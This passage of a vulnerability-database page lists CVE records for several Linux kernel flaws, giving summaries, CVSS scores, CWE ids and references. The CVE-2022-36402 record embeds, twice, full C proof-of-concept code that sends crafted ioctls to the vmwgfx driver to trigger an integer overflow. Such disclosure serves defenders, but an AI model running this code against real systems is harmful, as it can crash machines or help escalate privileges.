          "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220629-0005/"
        },
        {
          "name": "DSA-5173",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5173"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-29581",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "5.18"
                          },
                          {
                            "version_affected": "\u003e=",
                            "version_value": "4.14"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "syzbot \u003csyzkaller@googlegroups.com\u003e"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-911 Improper Update of Reference Count"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8"
            },
            {
              "name": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8",
              "refsource": "MISC",
              "url": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8"
            },
            {
              "name": "[oss-security] 20220518 CVE-2022-29581: Linux kernel cls_u32 UAF",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2022/05/18/2"
            },
            {
              "name": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220629-0005/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220629-0005/"
            },
            {
              "name": "DSA-5173",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5173"
            },
            {
              "name": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-29581",
    "datePublished": "2022-05-17T16:50:12.000Z",
    "dateReserved": "2022-04-22T00:00:00.000Z",
    "dateUpdated": "2025-04-21T13:53:27.216Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-3239 (GCVE-0-2022-3239)

Vulnerability from cvelistv5 – Published: 2022-09-19 00:00 – Updated: 2024-08-03 01:00

Summary

A flaw use after free in the Linux kernel video4linux driver was found in the way user triggers em28xx_usb_probe() for the Empia 28xx based TV cards. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.

Severity

No CVSS data available.

CWE

CWE-416

Assigner

redhat

References

2 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/t…
https://security.netapp.com/advisory/ntap-2023021…

Impacted products

1 product

Vendor	Product	Version
n/a	Kernel	Affected: Linux kernel 5.18-rc1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:00:10.867Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c08eadca1bdfa099e20a32f8fa4b52b2f672236d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230214-0006/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Linux kernel 5.18-rc1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw use after free in the Linux kernel video4linux driver was found in the way user triggers em28xx_usb_probe() for the Empia 28xx based TV cards. A local user could use this flaw to crash the system or potentially escalate their privileges on the system."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-14T00:00:00.000Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c08eadca1bdfa099e20a32f8fa4b52b2f672236d"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230214-0006/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2022-3239",
    "datePublished": "2022-09-19T00:00:00.000Z",
    "dateReserved": "2022-09-19T00:00:00.000Z",
    "dateUpdated": "2024-08-03T01:00:10.867Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-3545 (GCVE-0-2022-3545)

Vulnerability from cvelistv5 – Published: 2022-10-17 00:00 – Updated: 2025-04-15 13:43

Title

Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free

Summary

A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability.

Severity

5.5 (Medium)


                        
                          CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-119 - Memory Corruption -> CWE-416 Use After Free

Assigner

VulDB

References

6 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/k…
https://vuldb.com/?id.211045
https://security.netapp.com/advisory/ntap-2022122…
https://www.debian.org/security/2023/dsa-5324	vendor-advisory
https://lists.debian.org/debian-lts-announce/2023…	mailing-list
https://lists.debian.org/debian-lts-announce/2023…	mailing-list

Impacted products

1 product

Vendor	Product	Version
Linux	Kernel	Affected: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:01.597Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211045"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20221223-0003/"
          },
          {
            "name": "DSA-5324",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5324"
          },
          {
            "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
          },
          {
            "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-3545",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-14T17:08:55.254158Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-15T13:43:19.382Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
        },
        {
          "url": "https://vuldb.com/?id.211045"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20221223-0003/"
        },
        {
          "name": "DSA-5324",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2023/dsa-5324"
        },
        {
          "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
        },
        {
          "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
        }
      ],
      "title": "Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3545",
    "datePublished": "2022-10-17T00:00:00.000Z",
    "dateReserved": "2022-10-17T00:00:00.000Z",
    "dateUpdated": "2025-04-15T13:43:19.382Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-3625 (GCVE-0-2022-3625)

Vulnerability from cvelistv5 – Published: 2022-10-21 00:00 – Updated: 2024-08-03 01:14

Title

Linux Kernel IPsec devlink.c devlink_param_get use after free

Summary

A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability.

Severity

4.6 (Medium)


                        
                          CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-119 - Memory Corruption -> CWE-416 Use After Free

Assigner

VulDB

References

3 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/k…
https://vuldb.com/?id.211929
https://lists.debian.org/debian-lts-announce/2022…	mailing-list

Impacted products

1 product

Vendor	Product	Version
Linux	Kernel	Affected: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.495Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=6b4db2e528f650c7fb712961aac36455468d5902"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211929"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-01T00:00:00.000Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=6b4db2e528f650c7fb712961aac36455468d5902"
        },
        {
          "url": "https://vuldb.com/?id.211929"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        }
      ],
      "title": "Linux Kernel IPsec devlink.c devlink_param_get use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3625",
    "datePublished": "2022-10-21T00:00:00.000Z",
    "dateReserved": "2022-10-21T00:00:00.000Z",
    "dateUpdated": "2024-08-03T01:14:02.495Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-36402 (GCVE-0-2022-36402)

Vulnerability from cvelistv5 – Published: 2022-09-16 16:08 – Updated: 2024-09-17 03:38

Title

There is an int overflow vulnerability in vmwgfx driver

Summary

An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-118 - Incorrect Access of Indexable Resource ('Range Error')

Assigner

Anolis

References

1 reference

URL	Tags
https://bugzilla.openanolis.cn/show_bug.cgi?id=2072	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
Linux	kernel	Affected: v4.3-rc1 , < 5.13.0-52* (custom)

Date Public

2022-09-06 00:00

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:00:04.458Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.3-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-118",
              "description": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-16T16:08:01.000Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an int overflow vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-36402",
          "STATE": "PUBLIC",
          "TITLE": "There is an int overflow vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.3-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
